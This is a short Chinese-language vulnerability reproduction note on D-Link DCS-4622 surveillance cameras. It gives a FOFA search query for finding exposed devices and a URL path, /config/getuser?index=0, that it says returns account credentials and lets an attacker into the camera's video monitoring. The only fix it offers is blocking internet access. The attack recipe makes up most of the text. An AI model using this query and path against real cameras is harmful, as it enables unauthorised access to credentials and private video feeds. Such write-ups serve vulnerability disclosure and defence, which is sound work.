一:简介
D_Link-DCS-4622监控通过访问特定的URL得到账号密码信息,攻击者通过漏洞进入后台可以获取视频监控页面。
漏洞描述
D_Link-DCS-4622监控通过访问特定的URL得到账号密码信息,攻击者通过漏洞进入后台可以获取视频监控页面。危害级别:中危|攻击复杂度:低
二:漏洞复现
步骤一:使用fofa搜索一下语句,并随便打开一个页面!!!
下面展示一些 内联代码片
。
app="D_Link-DCS-4622"
步骤二:拼接一下路径并进行访问,得到账号密码回到登录界面进入查看…
/config/getuser?index=0
三:修补方法
禁止互联网访问
/config/getuser?index=0